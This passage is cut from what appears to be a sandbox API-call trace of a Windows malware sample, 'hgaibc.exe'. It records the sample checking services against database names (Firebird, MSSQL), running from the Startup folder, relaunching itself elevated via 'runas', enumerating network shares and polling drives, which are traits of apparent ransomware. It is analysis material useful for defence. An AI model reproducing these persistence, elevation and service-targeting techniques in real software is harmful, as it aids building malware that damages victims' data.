lpString2="nsi") returned 1 [0179.526] lstrlenW (lpString="PcaSvc") returned 6 [0179.526] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0179.526] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0179.526] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0179.526] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0179.526] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0179.526] lstrlenW (lpString="PlugPlay") returned 8 [0179.526] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0179.526] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0179.526] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0179.526] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0179.526] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0179.526] lstrlenW (lpString="Power") returned 5 [0179.526] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0179.526] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0179.526] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0179.526] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0179.526] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0179.526] lstrlenW (lpString="ProfSvc") returned 7 [0179.526] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0179.526] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0179.526] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0179.526] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0179.526] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0179.526] lstrlenW (lpString="RpcEptMapper") returned 12 [0179.526] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0179.526] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0179.526] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0179.526] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0179.526] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0179.527] lstrlenW (lpString="RpcSs") returned 5 [0179.527] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0179.527] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0179.527] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0179.527] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0179.527] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0179.527] lstrlenW (lpString="SamSs") returned 5 [0179.527] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0179.527] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0179.527] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0179.527] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0179.527] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0179.527] lstrlenW (lpString="Schedule") returned 8 [0179.527] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0179.527] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0179.527] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0179.527] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0179.527] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0179.527] lstrlenW (lpString="SecurityHealthService") returned 21 [0179.527] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0179.527] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0179.527] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0179.527] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0179.527] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0179.527] lstrlenW (lpString="SENS") returned 4 [0179.527] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0179.527] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0179.527] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0179.527] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0179.527] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0179.527] lstrlenW (lpString="ShellHWDetection") returned 16 [0179.527] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0179.528] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0179.528] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0179.528] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0179.528] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0179.528] lstrlenW (lpString="Spooler") returned 7 [0179.528] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0179.528] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0179.528] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0179.528] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0179.528] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0179.528] lstrlenW (lpString="StateRepository") returned 15 [0179.528] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0179.528] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0179.528] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0179.528] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0179.528] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0179.528] lstrlenW (lpString="SysMain") returned 7 [0179.528] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0179.528] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0179.528] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0179.528] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0179.528] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0179.528] lstrlenW (lpString="SystemEventsBroker") returned 18 [0179.528] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0179.528] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0179.528] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0179.528] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0179.528] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0179.529] lstrlenW (lpString="Themes") returned 6 [0179.529] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0179.529] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0179.529] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0179.529] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0179.529] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0179.529] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0179.529] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0179.529] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0179.529] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0179.529] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0179.529] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fd308 | out: hHeap=0x6a0000) returned 1 [0179.529] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) Thread: id = 35 os_tid = 0xe4c [0153.487] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6fa298 [0153.488] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x72a3d8 [0153.488] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6fa1a8 [0153.488] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6fa1a8, Size=0x20) returned 0x6dd9d0 [0153.488] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6fa0b8 [0153.488] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6fa0b8, Size=0x20) returned 0x6dd9a8 [0153.488] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77050000 [0153.489] GetProcAddress (hModule=0x77050000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77066b30 [0153.489] Wow64DisableWow64FsRedirection (in: OldValue=0x262ff20 | out: OldValue=0x262ff20*=0x0) returned 1 [0153.489] lstrlenW (lpString="kernel32.dll") returned 12 [0153.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dd9d0 | out: hHeap=0x6a0000) returned 1 [0153.489] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0153.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dd9a8 | out: hHeap=0x6a0000) returned 1 [0153.489] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72a3d8, nSize=0x7fff | out: lpFilename="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\hgaibc.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\hgaibc.exe")) returned 0x47 [0153.498] ShellExecuteExW (in: pExecInfo=0x262ff2c*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\hgaibc.exe", lpParameters="-a", lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x262ff2c*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\hgaibc.exe", lpParameters="-a", lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0177.226] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x456d1e0 [0177.226] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x456d1e0, Size=0x20) returned 0x458c358 [0177.226] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x456d2d0 [0177.226] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x456d2d0, Size=0x20) returned 0x458c178 [0177.227] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77050000 [0177.227] GetProcAddress (hModule=0x77050000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77066b30 [0177.227] Wow64DisableWow64FsRedirection (in: OldValue=0x0 | out: OldValue=0x0) returned 0 [0177.229] lstrlenW (lpString="kernel32.dll") returned 12 [0177.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458c178 | out: hHeap=0x6a0000) returned 1 [0177.229] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0177.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458c358 | out: hHeap=0x6a0000) returned 1 [0177.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x72a3d8 | out: hHeap=0x6a0000) returned 1 [0177.229] lstrlenW (lpString="runas") returned 5 [0177.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fa298 | out: hHeap=0x6a0000) returned 1 [0177.229] WaitForSingleObject (hHandle=0x1ec, dwMilliseconds=0x0) returned 0x0 [0177.229] ReleaseMutex (hMutex=0x1ec) returned 1 [0177.229] Sleep (dwMilliseconds=0x1f4) [0177.783] WaitForSingleObject (hHandle=0x1ec, dwMilliseconds=0x0) returned 0x102 [0177.783] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e3480 | out: hHeap=0x6a0000) returned 1 Thread: id = 36 os_tid = 0xe50 [0153.657] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6f9ff8 [0153.657] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6f9ff8, Size=0x20) returned 0x6ddc28 [0153.657] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6ddc28, Size=0x40) returned 0x6b7940 [0153.657] GetLogicalDrives () returned 0x4 [0153.657] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x73b7f0 [0153.658] GetComputerNameW (in: lpBuffer=0x73b7f4, nSize=0x272ff64 | out: lpBuffer="NQDPDE", nSize=0x272ff64) returned 1 [0153.658] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1000) returned 0x7005e0 [0153.658] WNetOpenEnumW (in: dwScope=0x3, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x272ff34 | out: lphEnum=0x272ff34*=0x6b6110) returned 0x0 [0153.659] WNetEnumResourceW (in: hEnum=0x6b6110, lpcCount=0x272ff30, lpBuffer=0x7005e0, lpBufferSize=0x272ff38 | out: lpcCount=0x272ff30, lpBuffer=0x7005e0, lpBufferSize=0x272ff38) returned 0x103 [0153.659] WNetCloseEnum (hEnum=0x6b6110) returned 0x0 [0153.659] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x272ff34 | out: lphEnum=0x272ff34*=0x6ba5b0) returned 0x0 [0153.881] WNetEnumResourceW (in: hEnum=0x6ba5b0, lpcCount=0x272ff30, lpBuffer=0x7005e0, lpBufferSize=0x272ff38 | out: lpcCount=0x272ff30, lpBuffer=0x7005e0, lpBufferSize=0x272ff38) returned 0x0 [0153.881] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1000) returned 0x705a68 [0153.881] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x7005e0, lphEnum=0x272ff08 | out: lphEnum=0x272ff08*=0x6b6250) returned 0x0 [0154.484] WNetEnumResourceW (in: hEnum=0x6b6250, lpcCount=0x272ff04, lpBuffer=0x705a68, lpBufferSize=0x272ff0c | out: lpcCount=0x272ff04, lpBuffer=0x705a68, lpBufferSize=0x272ff0c) returned 0x103 [0154.484] WNetCloseEnum (hEnum=0x6b6250) returned 0x0 [0154.484] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1000) returned 0x7193e0 [0154.484] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x700600, lphEnum=0x272ff08 | out: lphEnum=0x272ff08*=0x0) returned 0x4b8 [0169.808] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1000) returned 0x44ec0e0 [0169.808] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x700620, lphEnum=0x272ff08 | out: lphEnum=0x272ff08*=0x0) returned 0x4c6 [0169.814] WNetEnumResourceW (in: hEnum=0x6ba5b0, lpcCount=0x272ff30, lpBuffer=0x7005e0, lpBufferSize=0x272ff38 | out: lpcCount=0x272ff30, lpBuffer=0x7005e0, lpBufferSize=0x272ff38) returned 0x103 [0169.814] WNetCloseEnum (hEnum=0x6ba5b0) returned 0x0 [0169.814] GetLogicalDrives () returned 0x4 [0169.814] Sleep (dwMilliseconds=0x64) [0170.208] GetLogicalDrives () returned 0x4 [0170.208] Sleep (dwMilliseconds=0x64) [0170.593] GetLogicalDrives () returned 0x4 [0170.593] Sleep (dwMilliseconds=0x64) [0170.866] GetLogicalDrives () returned 0x4 [0170.866] Sleep (dwMilliseconds=0x64) [0171.147] GetLogicalDrives () returned 0x4 [0171.147] Sleep (dwMilliseconds=0x64) [0171.397] GetLogicalDrives () returned 0x4 [0171.397] Sleep (dwMilliseconds=0x64) [0171.589] GetLogicalDrives () returned 0x4 [0171.592] Sleep (dwMilliseconds=0x64) [0171.755] GetLogicalDrives () returned 0x4 [0171.755] Sleep (dwMilliseconds=0x64) [0172.237] GetLogicalDrives () returned 0x4 [0172.237] Sleep (dwMilliseconds=0x64) [0172.484] GetLogicalDrives () returned 0x4 [0172.484] Sleep (dwMilliseconds=0x64) [0172.625] GetLogicalDrives () returned 0x4 [0172.625] Sleep (dwMilliseconds=0x64) [0172.841] GetLogicalDrives () returned 0x4 [0172.848] Sleep (dwMilliseconds=0x64) [0173.127] GetLogicalDrives () returned 0x4 [0173.127] Sleep (dwMilliseconds=0x64) [0173.310] GetLogicalDrives () returned 0x4 [0173.310] Sleep (dwMilliseconds=0x64) [0173.466] GetLogicalDrives () returned 0x4 [0173.466] Sleep (dwMilliseconds=0x64) [0173.912] GetLogicalDrives () returned 0x4 [0173.912] Sleep (dwMilliseconds=0x64) [0174.278] GetLogicalDrives () returned 0x4 [0174.278] Sleep (dwMilliseconds=0x64) [0174.777] GetLogicalDrives () returned 0x4 [0174.777] Sleep (dwMilliseconds=0x64) [0175.137] GetLogicalDrives () returned 0x4 [0175.137] Sleep (dwMilliseconds=0x64) [0175.499] GetLogicalDrives () returned 0x4 [0175.499] Sleep (dwMilliseconds=0x64) [0175.714] GetLogicalDrives () returned 0x4 [0175.714] Sleep (dwMilliseconds=0x64) [0175.945] GetLogicalDrives () returned 0x4 [0175.945] Sleep (dwMilliseconds=0x64) [0176.071] GetLogicalDrives () returned 0x4 [0176.071] Sleep (dwMilliseconds=0x64) [0176.282] GetLogicalDrives () returned 0x4 [0176.285] Sleep (dwMilliseconds=0x64) [0176.448] GetLogicalDrives () returned 0x4 [0176.448] Sleep (dwMilliseconds=0x64) [0176.717] GetLogicalDrives () returned 0x4 [0176.717] Sleep (dwMilliseconds=0x64) [0176.966] GetLogicalDrives () returned 0x4 [0176.966] Sleep (dwMilliseconds=0x64) [0177.185] GetLogicalDrives () returned 0x4 [0177.185] Sleep (dwMilliseconds=0x64) [0177.322] GetLogicalDrives () returned 0x4 [0177.322] Sleep (dwMilliseconds=0x64) [0177.484] GetLogicalDrives () returned 0x4 [0177.484] Sleep (dwMilliseconds=0x64) [0177.633] GetLogicalDrives () returned 0x4 [0177.633] Sleep (dwMilliseconds=0x64) [0177.782] GetLogicalDrives () returned 0x4 [0177.782] Sleep (dwMilliseconds=0x64) [0177.973] lstrlenW (lpString="ABCDEFGHIJKLMNOPQRSTUVWXYZ") returned 26 [0177.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b7940 | out: hHeap=0x6a0000) returned 1 Thread: id = 37 os_tid = 0xe54 [0155.056] GetTickCount () returned 0x1270b [0155.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6fbd70 [0155.056] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x6fbd70, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x320 [0155.058] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x6fbd70, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x324 [0155.058] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x6fbd70, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x328 [0155.059] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x6fbd70, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x32c [0155.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x703338 [0155.063] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x703338, Size=0x20) returned 0x6ddf20 [0155.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x703278 [0155.063] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x703278, Size=0x20) returned 0x6ddf70 [0155.063] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77050000 [0155.063] GetProcAddress (hModule=0x77050000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77066b30 [0155.063] Wow64DisableWow64FsRedirection (in: OldValue=0x282ff7c | out: OldValue=0x282ff7c*=0x0) returned 1 [0155.063] lstrlenW (lpString="kernel32.dll") returned 12 [0155.063] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ddf20 | out: hHeap=0x6a0000) returned 1 [0155.063] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0155.063] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ddf70 | out: hHeap=0x6a0000) returned 1 [0155.064] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091a0, lpParameter=0x6e6f70, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x330 [0155.064] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0155.222] GetTickCount () returned 0x127b7 [0155.222] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0155.599] GetTickCount () returned 0x1292e [0155.599] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0156.202] GetTickCount () returned 0x12b7f [0156.202] GetTickCount () returned 0x12b7f [0156.202] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0156.867] GetTickCount () returned 0x12e1f [0156.867] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0157.263] GetTickCount () returned 0x12fa6 [0157.263] GetTickCount () returned 0x12fa6 [0157.263] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0157.482] GetTickCount () returned 0x13081 [0157.482] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0157.944] GetTickCount () returned 0x13246 [0157.944] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0158.361] GetTickCount () returned 0x133ec [0158.361] GetTickCount () returned 0x133ec [0158.361] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0158.615] GetTickCount () returned 0x134e6 [0158.615] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0158.943] GetTickCount () returned 0x1362e [0158.943] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0159.316] GetTickCount () returned 0x137a5 [0159.316] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0159.633] GetTickCount () returned 0x138ed [0159.633] GetTickCount () returned 0x138ed [0159.633] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0160.190] GetTickCount () returned 0x13b10 [0160.190] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0160.516] GetTickCount () returned 0x13c58 [0160.516] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0160.820] GetTickCount () returned 0x13d90 [0160.820] GetTickCount () returned 0x13d90 [0160.820] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0161.086] GetTickCount () returned 0x13e9a [0161.086] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0161.337] GetTickCount () returned 0x13f94 [0161.337] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0161.499] GetTickCount () returned 0x14030 [0161.499] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0161.754] GetTickCount () returned 0x1412a [0161.754] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0161.992] GetTickCount () returned 0x14224 [0161.992] GetTickCount () returned 0x14224 [0161.992] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0162.264] GetTickCount () returned 0x1432e [0162.264] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0162.465] GetTickCount () returned 0x143f9 [0162.465] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0162.785] GetTickCount () returned 0x14532 [0162.785] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0163.040] GetTickCount () returned 0x1463b [0163.040] GetTickCount () returned 0x1463b [0163.040] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0163.460] GetTickCount () returned 0x147e1 [0163.460] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0163.798] GetTickCount () returned 0x14929 [0163.798] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0164.192] GetTickCount () returned 0x14ab0 [0164.192] GetTickCount () returned 0x14ab0 [0164.192] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0164.661] GetTickCount () returned 0x14c85 [0164.661] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0164.900] GetTickCount () returned 0x14d8e [0164.900] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0165.071] GetTickCount () returned 0x14e3a [0165.071] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0165.341] GetTickCount () returned 0x14f44 [0165.341] GetTickCount () returned 0x14f44 [0165.341] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0165.718] GetTickCount () returned 0x150bb [0165.718] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0166.018] GetTickCount () returned 0x151e4 [0166.018] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0166.259] GetTickCount () returned 0x152ce [0166.259] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0166.759] GetTickCount () returned 0x154c2 [0166.759] GetTickCount () returned 0x154c2 [0166.759] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0167.056] GetTickCount () returned 0x155eb [0167.056] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0167.234] GetTickCount () returned 0x156a6 [0167.234] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0167.588] GetTickCount () returned 0x157fe [0167.588] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0167.783] GetTickCount () returned 0x158c9 [0167.783] GetTickCount () returned 0x158c9 [0167.783] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0167.966] GetTickCount () returned 0x15975 [0167.966] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0168.269] GetTickCount () returned 0x15aae [0168.269] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0168.851] GetTickCount () returned 0x15cf0 [0168.851] GetTickCount () returned 0x15cf0 [0168.851] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0169.602] GetTickCount () returned 0x15fde [0169.602] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0170.024] GetTickCount () returned 0x16193 [0170.024] GetTickCount () returned 0x16193 [0170.024] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0170.291] GetTickCount () returned 0x1629d [0170.291] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0170.596] GetTickCount () returned 0x163c6 [0170.596] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0170.865] GetTickCount () returned 0x164cf [0170.865] 